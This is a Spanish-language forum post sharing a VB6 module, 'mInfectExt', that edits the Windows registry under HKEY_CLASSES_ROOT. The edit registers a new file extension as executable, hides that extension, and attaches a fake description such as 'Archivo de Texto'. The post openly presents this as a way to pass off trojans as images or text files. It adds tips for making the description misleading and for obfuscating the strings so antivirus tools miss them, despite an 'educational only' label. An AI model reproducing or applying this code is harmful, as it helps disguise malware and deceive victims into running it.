Que hace?Modifica el Registro añadiendo una nueva extensión de archivo
Para que sirve?Posta esto sirve?Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.
Como hace?Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj
HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"
Codigo mInfectExt
Option Explicit
' /-----------------------------------------------------------------------------------\
'|=====================================================================================|
'|=/---------------------------------------------------------------------------------\=|
'|=| Module : mInfectExt |=|
'|=| DateTime : 24/07/2010 05:14 PM |=|
'|=| Author : Elemental Code |=|
'|=| Mail : Elemental_Code[at]hotmail[dot]com |=|
'|=| WebPage : I haven't got one Yet ^.^ |=|
'|=| Purpose : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
'|=| Requirements: UAC may Stop you, i dont know >.< |=|
'|=| Distribution: You can freely use this code in your own |=|
'|=| applications, but you may not reproduce |=|
'|=| or publish this code on any web site, |=|
'|=| online service, or distribute as source |=|
'|=| on any media without express permission. |=|
'|=\---------------------------------------------------------------------------------/=|
'|=====================================================================================|
' \-----------------------------------------------------------------------------------/
Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
Dim WS As Object
Dim FullExt As String
Dim UniqVal As String
UniqVal = Ext & "File"
FullExt = "." & Ext
Set WS = CreateObject("WScript.Shell")
WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
WS.RegWrite "HKCR\" & UniqVal & "\", Info
If Ocult = True Then
WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
EndIf
WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
End Function
Como Usarlo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)
InfectExt "virus", "Archivo de Texto", True
PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^
Editado, Ahora permite elegir si la extensión queda siempre oculta o no.